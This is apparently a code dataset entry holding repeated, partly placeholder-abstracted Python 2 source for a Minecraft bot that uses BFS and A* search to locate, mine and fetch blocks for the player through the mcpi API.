            self._add_to_inv(block_)\n
        self._move(new_pos)\n
\n
    def _add_to_inv(self, block_):\n
        \"\"\"Add the block to the inventory.\"\"\"\n
        if block_ in self._inventory:\n
            self._inventory[block_] += 1\n
        else:\n
            self._inventory[block_] = 1\n
\n
    def _move_up(self, exclude=None):\n
        \"\"\"Move and place a block below.\n
\n
        If exclude is not None, place a block that is not 'exclude'.\n
        \"\"\"\n
        self._move(self._pos + _Vec3(0, 1, 0))\n
        self._place(self._pos + _Vec3(0, -1, 0), exclude)\n
\n
    def _mine(self, loc):\n
        \"\"\"Mine the block.\"\"\"\n
        block_ = self._get_block(loc)\n
        self._add_to_inv(block_)\n
        self._set_block(loc, _AIR)\n
\n
    def _get_move_actions(self, exclude=None):\n
        \"\"\"Return a list of legal movement actions.\n
\n
        exclude is the block to exclude.\n
        \"\"\"\n
        rtn = []\n
        can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n
            _WATER}\n
        if can_move_up:\n
            if self._surrounded():\n
                rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0,\n
                    1, 0),)})\n
            else:\n
                rtn.append({'func': '_move_up', 'args': (exclude,)})\n
        hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n
        if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n
            rtn.append({'func': '_move_down'})\n
        for dir_ in _adj_dirs():\n
            rtn.extend(self._side_moves(dir_, can_move_up))\n
        return rtn\n
\n
    def _side_moves(self, dir_, can_move_up):\n
        \"\"\"Return the list of side moves.\n
\n
        dir_ is an adjacent direction.\n
        can_move_up is a boolean for whether or not the bot can move up.\n
        \"\"\"\n
        rtn = []\n
        base_pos = self._pos + dir_\n
        base_block = self._get_block(base_pos)\n
        empty_blocks = {_AIR, _WATER}\n
        if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n
            for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n
                if self._get_block(base_pos + vert_dir) not in empty_blocks:\n
                    break\n
            else:\n
                rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n
                    0),)})\n
        for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n
            if self._get_block(base_pos + vert_dir) not in empty_blocks:\n
                break\n
        else:\n
            pos = base_pos + _Vec3(0, -1, 0)\n
            for _ in xrange(_DROP_PLUS_1):\n
                block_ = self._get_block(pos)\n
                if block_ != _AIR:\n
                    if block_ != _LAVA:\n
                        rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n
                            1, 0),)})\n
                    break\n
                pos.y -= 1\n
        # Without this return the caller's rtn.extend() would receive None.\n
        return rtn\n
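\n
    # Each legal action is a plain dict that take_action() dispatches by\n
    # method name -- e.g. (illustrative values only):\n
    #\n
    #   {'func': '_move', 'args': (_Vec3(0, 64, 0),)}\n
    #   {'func': '_place', 'args': (_Vec3(1, 63, 0),), 'kwargs': {'exclude': _AIR}}\n
\n
    def 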
_surrounded(self):\n
        \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n
        for dir_ in _adj_dirs():\n
            if self._get_block(self._pos + dir_) != _WATER:\n
                return False\n
        return True\n
\n
    def _get_mine_actions(self):\n
        \"\"\"Return a list of legal mining actions (that only involve mining\n
        and not moving).\"\"\"\n
        rtn = []\n
        dont_mine = {_AIR, _WATER, _LAVA}\n
        pos_above = self._pos + _Vec3(0, 2, 0)\n
        if self._get_block(pos_above) not in dont_mine:\n
            rtn.append({'func': '_mine', 'args': (pos_above,)})\n
        for dir_ in _adj_dirs():\n
            pos = self._pos + dir_\n
            for _ in xrange(2):\n
                if self._get_block(pos) not in dont_mine:\n
                    rtn.append({'func': '_mine', 'args': (pos,)})\n
                pos = pos + _Vec3(0, 1, 0)\n
        return rtn\n
\n
    def _get_placement_actions(self, exclude=None):\n
        \"\"\"Return a list of legal actions that only involve placing a block\n
        from the inventory.\n
\n
        exclude is a block id. It is the block that should not be placed. If None,\n
        any block can be placed.\"\"\"\n
        if not self._has_blocks_to_place(exclude=exclude):\n
            return []\n
        dirs = [_Vec3(0, 2, 0)]\n
        for dir_ in _adj_dirs():\n
            dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n
            if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n
                dirs.append(dir_ + _Vec3(0, -1, 0))\n
        rtn = []\n
        for dir_ in dirs:\n
            pos = self._pos + dir_\n
            if self._can_place(pos):\n
                rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n
                    'exclude': exclude}})\n
        return rtn\n
\n
    def _can_place(self, loc):\n
        \"\"\"Return whether or not the bot can place a block at that location\n
        independent of what it has in its inventory.\"\"\"\n
        non_blocks = [_AIR, _WATER, _LAVA]\n
        player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n
        # _adj_dirs is a function; it must be called to get the direction list.\n
        for dir_ in (_adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n
            new_loc = loc + dir_\n
            if (new_loc not in player and\n
                    self._get_block(new_loc) not in non_blocks):\n
                return True\n
        return False\n
\n
    def _has_blocks_to_place(self, exclude=None):\n
        \"\"\"Return whether or not the bot can place a block from the\n
        inventory. If exclude is None, any block can be placed.\"\"\"\n
        for block_ in self._inventory:\n
            if block_ != exclude:\n
                return True\n
        return False\n
\n
    def _set_block(self, pos, block_):\n
        \"\"\"Set a block. block_ is the block id.\"\"\"\n
        raise NotImplementedError\n
\n
    def _move(self, pos):\n
        \"\"\"Move there only.\"\"\"\n
        self._pos = deepcopy(pos)\n
\n
\n
class _ImaginaryBot(_GenericBot):\n
    \"\"\"A bot used for finding paths that doesn't actually change blocks\n
    in the world.\"\"\"\n
\n
    def __init__(self, pos, inventory=None):\n
        \"\"\"Create a new bot.\"\"\"\n
        _GenericBot.__init__(self, pos, inventory)\n
        self._changes = {}\n
\n
    def _set_block(self, pos, block_):\n
        \"\"\"Set a block. 
block_ is the block id.\"\"\"\n
        self._changes[deepcopy(pos)] = block_\n
\n
    def _get_block(self, pos):\n
        \"\"\"Get the block at the position.\"\"\"\n
        if pos in self._changes:\n
            return self._changes[pos]\n
        else:\n
            return _get_mc().getBlock(pos)\n
\n
    def get_block(self, pos):\n
        \"\"\"The public version.\"\"\"\n
        return self._get_block(pos)\n
\n
    def __hash__(self):\n
        \"\"\"Return the hash.\"\"\"\n
        return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n
            _key_vals(self._changes)))\n
\n
\n
class Bot(_GenericBot):\n
    \"\"\"The real bot.\n
\n
    All vector arguments are Vec3s.\"\"\"\n
    _BOT_BLOCK = block.IRON_BLOCK.id\n
\n
    def __init__(self):\n
        \"\"\"Create a bot next to the player.\"\"\"\n
        pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n
        pos = _Vec3(pos.x, pos.y, pos.z)\n
        _GenericBot.__init__(self, pos)\n
        self._pos = pos\n
        self._move(self._pos)\n
\n
    @staticmethod\n
    def destroy_all():\n
        \"\"\"Destroy all bots within a small distance (in case I forget to\n
        destroy one).\"\"\"\n
        player_loc = _player_loc()\n
        minec = _get_mc()\n
        rad = 10\n
        for x in xrange(player_loc.x - rad, player_loc.x + rad):\n
            for y in xrange(player_loc.y - rad, player_loc.y + rad):\n
                for z in xrange(player_loc.z - rad, player_loc.z + rad):\n
                    if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n
                        minec.setBlock(x, y, z, _AIR)\n
\n
    def destroy(self):\n
        \"\"\"Set itself to air.\"\"\"\n
        self._set_block(self._pos, _AIR)\n
        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n
\n
    def fetch(self, block_name):\n
        \"\"\"Mine and return a block to the player.\"\"\"\n
        imag_bot = _ImaginaryBot(self._pos, self._inventory)\n
        block_id = getattr(block, block_name).id\n
        block_loc = self._get_block_loc(block_id)\n
        mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n
        mine_actions = astar(mine_prob, _mine_heuristic)\n
        self.take_actions(mine_actions, _DELAY)\n
        imag_bot = _ImaginaryBot(self._pos, self._inventory)\n
        player_loc = _player_loc()\n
        return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n
        return_actions = astar(return_prob, _return_heuristic)\n
        imag_bot.take_actions(return_actions)\n
        return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos() +\n
            player_loc) / 2,), 'kwargs': {'block_': block_id}})\n
        self.take_actions(return_actions, _DELAY)\n
\n
    def _get_block_loc(self, block_id):\n
        \"\"\"Return the location of the block.\"\"\"\n
        find_prob = FindProblem(self._pos, block_id)\n
        dirs = bfs(find_prob)\n
        return self._pos + sum(dirs)\n
\n
    def _set_block(self, pos, block_):\n
        \"\"\"Place an actual block in the world.\n
\n
        block_ is a block id.\"\"\"\n
        _get_mc().setBlock(pos, block_)\n
\n
    def _get_block(self, pos):\n
        \"\"\"Get the block at the position.\"\"\"\n
        return _get_mc().getBlock(pos)\n
\n
    def _move(self, pos):\n
        \"\"\"Move there, and set the appropriate blocks.\"\"\"\n
        self._set_block(self._pos, _AIR)\n
        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n
        self._set_block(pos, self._BOT_BLOCK)\n
        self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n
        self._pos = pos\n
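\n
\n
# Hedged usage sketch (assumes a running Minecraft server reachable through\n
# mcpi, and that the name passed to fetch() is an attribute of mcpi.block,\n
# e.g. DIAMOND_ORE):\n
#\n
#   bot = Bot()                # builds an iron-block bot beside the player\n
#   bot.fetch('DIAMOND_ORE')   # A*-mine the nearest match and bring it back\n
#   bot.destroy()              # clear this bot's blocks\n
#   Bot.destroy_all()          # or sweep away any forgotten bots nearby\n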
\n
\n
class FindProblem(SearchProblem):\n
    \"\"\"Problem for finding the location of a block in the world.\n
\n
    A state in this problem is a location.\n
    \"\"\"\n
\n
    def __init__(self, start_loc, block_id):\n
        \"\"\"Initialize.\"\"\"\n
        self._start_loc = deepcopy(start_loc)\n
        self._block_id = block_id\n
\n
    def getStartState(self):\n
        \"\"\"Return the starting location.\"\"\"\n
        return self._start_loc\n
\n
    def isGoalState(self, state):\n
        return _get_mc().getBlock(state) == self._block_id\n
\n
    def getSuccessors(self, state):\n
        \"\"\"Return the successors.\"\"\"\n
        rtn = []\n
        for dir_ in _all_dirs():\n
            successor = state + dir_\n
            if (successor.y <= _get_mc().getHeight(successor.x, successor.z) and\n
                    _get_mc().getBlock(successor) != _BEDROCK):\n
                rtn.append((successor, dir_, 1))\n
        return rtn\n
\n
\n
class _MineProblem(SearchProblem):\n
    \"\"\"The problem of finding the block and mining it (not returning\n
    it).\"\"\"\n
\n
    def __init__(self, imag_bot, block_loc, block_id):\n
        \"\"\"Initialize the problem with an _ImaginaryBot.\n
\n
        block_loc is a Vec3.\n
        \"\"\"\n
        self._bot = imag_bot\n
        self._block_loc = deepcopy(block_loc)\n
        self._block_id = block_id\n
\n
    def get_block_loc(self):\n
        \"\"\"Return the block location.\"\"\"\n
        return deepcopy(self._block_loc)\n
\n
    def get_block_id(self):\n
        \"\"\"Return the block it's trying to mine.\"\"\"\n
        return self._block_id\n
\n
    def getStartState(self):\n
        \"\"\"Return the bot passed in.\"\"\"\n
        return self._bot\n
\n
    def isGoalState(self, state):\n
        \"\"\"Return whether or not the bot has the block.\"\"\"\n
        return state.contains(self._block_id)\n
\n
    def getSuccessors(self, state):\n
        \"\"\"Return the successors.\"\"\"\n
        rtn = []\n
        for action in state.get_legal_actions():\n
            successor = deepcopy(state)\n
            successor.take_action(action)\n
            rtn.append((successor, action, 1))\n
        return rtn\n
\n
\n
class _ReturnProblem(SearchProblem):\n
    \"\"\"The problem of returning to the player. This does not place the block\n
    next to the player.\"\"\"\n
\n
    def __init__(self, imag_bot, block_, player_loc):\n
        \"\"\"Initialize the problem with an _ImaginaryBot.\n
\n
        block_ is a block id.\"\"\"\n
        self._bot = imag_bot\n
        self._block = block_\n
        self._player_loc = player_loc\n
\n
    def get_player_loc(self):\n
        \"\"\"Return the player location.\"\"\"\n
        return deepcopy(self._player_loc)\n
\n
    def getStartState(self):\n
        \"\"\"Return the bot passed in.\"\"\"\n
        return self._bot\n
\n
    def isGoalState(self, state):\n
        \"\"\"Return whether or not the bot is next to the player.\"\"\"\n
        diff = state.get_pos() - self._player_loc\n
        return (diff.y == 0 and (diff.x == 0 or diff.z == 0) and\n
            abs(diff.x) + abs(diff.z) == 2 and\n
            state.get_block(self._player_loc + diff / 2 + _Vec3(0, -1, 0))\n
            not in (_AIR, _LAVA, _WATER))\n
\n
    def getSuccessors(self, state):\n
        \"\"\"Return the successors.\"\"\"\n
        rtn = []\n
        for action in state.get_legal_actions(self._block):\n
            successor = deepcopy(state)\n
            successor.take_action(action)\n
            rtn.append((successor, action, 1))\n
        return rtn\n
\n
\n
<function token>\n
<function token>\n
\n
\n
def _return_heuristic(bot, problem):\n
    \"\"\"Return the return heuristic.\n
\n
    bot is an _ImaginaryBot.\n
    \"\"\"\n
    bot_pos = bot.get_pos()\n
    player_pos = problem.get_player_loc()\n
    bot_plane_pos = bot_pos.x, bot_pos.z\n
    y_diff = bot_pos.y - player_pos.y\n
    drop = _DROP if y_diff > 0 else 1\n
    y_diff = abs(y_diff)\n
    drops = _drops(y_diff, drop)\n
    min_man = float('inf')\n
    for dir_ in _adj_dirs():\n
        loc = player_pos + 2 * dir_\n
        man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n
        if man_dist < min_man:\n
            min_man = man_dist\n
        if man_dist < drops:\n
            return drops\n
    return min_man\n
\n
\n
def _to_my_vec3(vec):\n
    \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n
    return _Vec3(vec.x, vec.y, vec.z)\n
\n
\n
def _player_loc():\n
    \"\"\"Return the player's location.\"\"\"\n
    return _to_my_vec3(_get_mc().player.getTilePos())\n
\n
\n
def _adj_dirs():\n
    \"\"\"Return the adjacent directions.\"\"\"\n
    return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]\n
\n
\n
def _all_dirs():\n
    \"\"\"Return all adjacent directions.\"\"\"\n
    return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]\n
\n
\n
def _manhattan(pos1, pos2):\n
    \"\"\"Return 
the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n<function token>\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ 
= self._get_block(loc)\n
        self._add_to_inv(block_)\n
        self._set_block(loc, _AIR)\n
\n
    def _get_move_actions(self, exclude=None):\n
        \"\"\"Return a list of legal movement actions.\n
\n
        exclude is the block to exclude.\n
        \"\"\"\n
        rtn = []\n
        can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n
            _WATER}\n
        if can_move_up:\n
            if self._surrounded():\n
                rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0,\n
                    1, 0),)})\n
            else:\n
                rtn.append({'func': '_move_up', 'args': (exclude,)})\n
        hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n
        if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n
            rtn.append({'func': '_move_down'})\n
        for dir_ in _adj_dirs():\n
            rtn.extend(self._side_moves(dir_, can_move_up))\n
        return rtn\n
\n
    def _side_moves(self, dir_, can_move_up):\n
        \"\"\"Return the list of side moves.\n
\n
        dir_ is an adjacent direction.\n
        can_move_up is a boolean for whether or not the bot can move up.\n
        \"\"\"\n
        rtn = []\n
        base_pos = self._pos + dir_\n
        base_block = self._get_block(base_pos)\n
        empty_blocks = {_AIR, _WATER}\n
        if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n
            for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n
                if self._get_block(base_pos + vert_dir) not in empty_blocks:\n
                    break\n
            else:\n
                rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n
                    0),)})\n
        for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n
            if self._get_block(base_pos + vert_dir) not in empty_blocks:\n
                break\n
        else:\n
            pos = base_pos + _Vec3(0, -1, 0)\n
            for _ in xrange(_DROP_PLUS_1):\n
                block_ = self._get_block(pos)\n
                if block_ != _AIR:\n
                    if block_ != _LAVA:\n
                        rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n
                            1, 0),)})\n
                    break\n
                pos.y -= 1\n
        return rtn\n
\n
    def _surrounded(self):\n
        \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n
        for dir_ in _adj_dirs():\n
            if self._get_block(self._pos + dir_) != _WATER:\n
                return False\n
        return True\n
\n
    def _get_mine_actions(self):\n
        \"\"\"Return a list of legal mining actions (that only involve mining\n
        and not moving).\"\"\"\n
        rtn = []\n
        dont_mine = {_AIR, _WATER, _LAVA}\n
        pos_above = self._pos + _Vec3(0, 2, 0)\n
        if self._get_block(pos_above) not in dont_mine:\n
            rtn.append({'func': '_mine', 'args': (pos_above,)})\n
        for dir_ in _adj_dirs():\n
            pos = self._pos + dir_\n
            for _ in xrange(2):\n
                if self._get_block(pos) not in dont_mine:\n
                    rtn.append({'func': '_mine', 'args': (pos,)})\n
                pos = pos + _Vec3(0, 1, 0)\n
        return rtn\n
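\n
    # Mining reach: the block just above the bot's head, plus the blocks at\n
    # body and head height in each of the four adjacent columns.\n
\n
    def 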
_get_placement_actions(self, exclude=None):\n
        \"\"\"Return a list of legal actions that only involve placing a block\n
        from the inventory.\n
\n
        exclude is a block id. It is the block that should not be placed. If None,\n
        any block can be placed.\"\"\"\n
        if not self._has_blocks_to_place(exclude=exclude):\n
            return []\n
        dirs = [_Vec3(0, 2, 0)]\n
        for dir_ in _adj_dirs():\n
            dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n
            if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n
                dirs.append(dir_ + _Vec3(0, -1, 0))\n
        rtn = []\n
        for dir_ in dirs:\n
            pos = self._pos + dir_\n
            if self._can_place(pos):\n
                rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n
                    'exclude': exclude}})\n
        return rtn\n
\n
    def _can_place(self, loc):\n
        \"\"\"Return whether or not the bot can place a block at that location\n
        independent of what it has in its inventory.\"\"\"\n
        non_blocks = [_AIR, _WATER, _LAVA]\n
        player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n
        for dir_ in (_adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n
            new_loc = loc + dir_\n
            if (new_loc not in player and\n
                    self._get_block(new_loc) not in non_blocks):\n
                return True\n
        return False\n
\n
    def _has_blocks_to_place(self, exclude=None):\n
        \"\"\"Return whether or not the bot can place a block from the\n
        inventory. If exclude is None, any block can be placed.\"\"\"\n
        for block_ in self._inventory:\n
            if block_ != exclude:\n
                return True\n
        return False\n
\n
    def _set_block(self, pos, block_):\n
        \"\"\"Set a block. block_ is the block id.\"\"\"\n
        raise NotImplementedError\n
\n
    def _move(self, pos):\n
        \"\"\"Move there only.\"\"\"\n
        self._pos = deepcopy(pos)\n
\n
\n
class _ImaginaryBot(_GenericBot):\n
    \"\"\"A bot used for finding paths that doesn't actually change blocks\n
    in the world.\"\"\"\n
\n
    def __init__(self, pos, inventory=None):\n
        \"\"\"Create a new bot.\"\"\"\n
        _GenericBot.__init__(self, pos, inventory)\n
        self._changes = {}\n
\n
    def _set_block(self, pos, block_):\n
        \"\"\"Set a block. block_ is the block id.\"\"\"\n
        self._changes[deepcopy(pos)] = block_\n
\n
    def _get_block(self, pos):\n
        \"\"\"Get the block at the position.\"\"\"\n
        if pos in self._changes:\n
            return self._changes[pos]\n
        else:\n
            return _get_mc().getBlock(pos)\n
\n
    def get_block(self, pos):\n
        \"\"\"The public version.\"\"\"\n
        return self._get_block(pos)\n
\n
    def __hash__(self):\n
        \"\"\"Return the hash.\"\"\"\n
        return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n
            _key_vals(self._changes)))\n
\n
\n
class Bot(_GenericBot):\n
    \"\"\"The real bot.\n
\n
    All vector arguments are Vec3s.\"\"\"\n
    _BOT_BLOCK = block.IRON_BLOCK.id\n
\n
    def __init__(self):\n
        \"\"\"Create a bot next to the player.\"\"\"\n
        pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n
        pos = _Vec3(pos.x, pos.y, pos.z)\n
        _GenericBot.__init__(self, pos)\n
        self._pos = pos\n
        self._move(self._pos)\n
\n
    @staticmethod\n
    def destroy_all():\n
        \"\"\"Destroy all bots within a small distance (in case I forget to\n
        destroy one).\"\"\"\n
        player_loc = _player_loc()\n
        minec = _get_mc()\n
        rad = 10\n
        for x in xrange(player_loc.x - rad, player_loc.x + rad):\n
            for y in xrange(player_loc.y - rad, player_loc.y + rad):\n
                for z in xrange(player_loc.z - rad, player_loc.z + rad):\n
                    if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n
                        minec.setBlock(x, y, z, _AIR)\n
\n
    def destroy(self):\n
        \"\"\"Set itself to air.\"\"\"\n
        self._set_block(self._pos, _AIR)\n
        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n
\n
    def fetch(self, block_name):\n
        \"\"\"Mine and return a block to the player.\"\"\"\n
        imag_bot = _ImaginaryBot(self._pos, self._inventory)\n
        block_id = getattr(block, block_name).id\n
        block_loc = self._get_block_loc(block_id)\n
        mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n
        mine_actions = astar(mine_prob, _mine_heuristic)\n
        self.take_actions(mine_actions, _DELAY)\n
        imag_bot = _ImaginaryBot(self._pos, self._inventory)\n
        player_loc = _player_loc()\n
        return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n
        return_actions = astar(return_prob, _return_heuristic)\n
        imag_bot.take_actions(return_actions)\n
        return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos() +\n
            player_loc) / 2,), 'kwargs': {'block_': block_id}})\n
        self.take_actions(return_actions, _DELAY)\n
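\n
    # For illustration only -- a plan returned by astar() is a list of such\n
    # action dicts (hypothetical values):\n
    #\n
    #   [{'func': '_mine', 'args': (_Vec3(10, 11, -3),)},\n
    #    {'func': '_move', 'args': (_Vec3(10, 11, -3),)}]\n
\n
    def 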
_get_block_loc(self, block_id):\n
        \"\"\"Return the location of the block.\"\"\"\n
        find_prob = FindProblem(self._pos, block_id)\n
        dirs = bfs(find_prob)\n
        return self._pos + sum(dirs)\n
\n
    def _set_block(self, pos, block_):\n
        \"\"\"Place an actual block in the world.\n
\n
        block_ is a block id.\"\"\"\n
        _get_mc().setBlock(pos, block_)\n
\n
    def _get_block(self, pos):\n
        \"\"\"Get the block at the position.\"\"\"\n
        return _get_mc().getBlock(pos)\n
\n
    def _move(self, pos):\n
        \"\"\"Move there, and set the appropriate blocks.\"\"\"\n
        self._set_block(self._pos, _AIR)\n
        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n
        self._set_block(pos, self._BOT_BLOCK)\n
        self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n
        self._pos = pos\n
\n
\n
class FindProblem(SearchProblem):\n
    \"\"\"Problem for finding the location of a block in the world.\n
\n
    A state in this problem is a location.\n
    \"\"\"\n
\n
    def __init__(self, start_loc, block_id):\n
        \"\"\"Initialize.\"\"\"\n
        self._start_loc = deepcopy(start_loc)\n
        self._block_id = block_id\n
\n
    def getStartState(self):\n
        \"\"\"Return the starting location.\"\"\"\n
        return self._start_loc\n
\n
    def isGoalState(self, state):\n
        return _get_mc().getBlock(state) == self._block_id\n
\n
    def getSuccessors(self, state):\n
        \"\"\"Return the successors.\"\"\"\n
        rtn = []\n
        for dir_ in _all_dirs():\n
            successor = state + dir_\n
            if (successor.y <= _get_mc().getHeight(successor.x, successor.z) and\n
                    _get_mc().getBlock(successor) != _BEDROCK):\n
                rtn.append((successor, dir_, 1))\n
        return rtn\n
\n
\n
class _MineProblem(SearchProblem):\n
    \"\"\"The problem of finding the block and mining it (not returning\n
    it).\"\"\"\n
\n
    def __init__(self, imag_bot, block_loc, block_id):\n
        \"\"\"Initialize the problem with an _ImaginaryBot.\n
\n
        block_loc is a Vec3.\n
        \"\"\"\n
        self._bot = imag_bot\n
        self._block_loc = deepcopy(block_loc)\n
        self._block_id = block_id\n
\n
    def get_block_loc(self):\n
        \"\"\"Return the block location.\"\"\"\n
        return deepcopy(self._block_loc)\n
\n
    def get_block_id(self):\n
        \"\"\"Return the block it's trying to mine.\"\"\"\n
        return self._block_id\n
\n
    def getStartState(self):\n
        \"\"\"Return the bot passed in.\"\"\"\n
        return self._bot\n
\n
    def isGoalState(self, state):\n
        \"\"\"Return whether or not the bot has the block.\"\"\"\n
        return state.contains(self._block_id)\n
\n
    def getSuccessors(self, state):\n
        \"\"\"Return the successors.\"\"\"\n
        rtn = []\n
        for action in state.get_legal_actions():\n
            successor = deepcopy(state)\n
            successor.take_action(action)\n
            rtn.append((successor, action, 1))\n
        return rtn\n
\n
\n
class _ReturnProblem(SearchProblem):\n
    \"\"\"The problem of returning to the player. 
This does not place the block\n
    next to the player.\"\"\"\n
\n
    def __init__(self, imag_bot, block_, player_loc):\n
        \"\"\"Initialize the problem with an _ImaginaryBot.\n
\n
        block_ is a block id.\"\"\"\n
        self._bot = imag_bot\n
        self._block = block_\n
        self._player_loc = player_loc\n
\n
    def get_player_loc(self):\n
        \"\"\"Return the player location.\"\"\"\n
        return deepcopy(self._player_loc)\n
\n
    def getStartState(self):\n
        \"\"\"Return the bot passed in.\"\"\"\n
        return self._bot\n
\n
    def isGoalState(self, state):\n
        \"\"\"Return whether or not the bot is next to the player.\"\"\"\n
        diff = state.get_pos() - self._player_loc\n
        return (diff.y == 0 and (diff.x == 0 or diff.z == 0) and\n
            abs(diff.x) + abs(diff.z) == 2 and\n
            state.get_block(self._player_loc + diff / 2 + _Vec3(0, -1, 0))\n
            not in (_AIR, _LAVA, _WATER))\n
\n
    def getSuccessors(self, state):\n
        \"\"\"Return the successors.\"\"\"\n
        rtn = []\n
        for action in state.get_legal_actions(self._block):\n
            successor = deepcopy(state)\n
            successor.take_action(action)\n
            rtn.append((successor, action, 1))\n
        return rtn\n
\n
\n
<function token>\n
<function token>\n
\n
\n
def _return_heuristic(bot, problem):\n
    \"\"\"Return the return heuristic.\n
\n
    bot is an _ImaginaryBot.\n
    \"\"\"\n
    bot_pos = bot.get_pos()\n
    player_pos = problem.get_player_loc()\n
    bot_plane_pos = bot_pos.x, bot_pos.z\n
    y_diff = bot_pos.y - player_pos.y\n
    drop = _DROP if y_diff > 0 else 1\n
    y_diff = abs(y_diff)\n
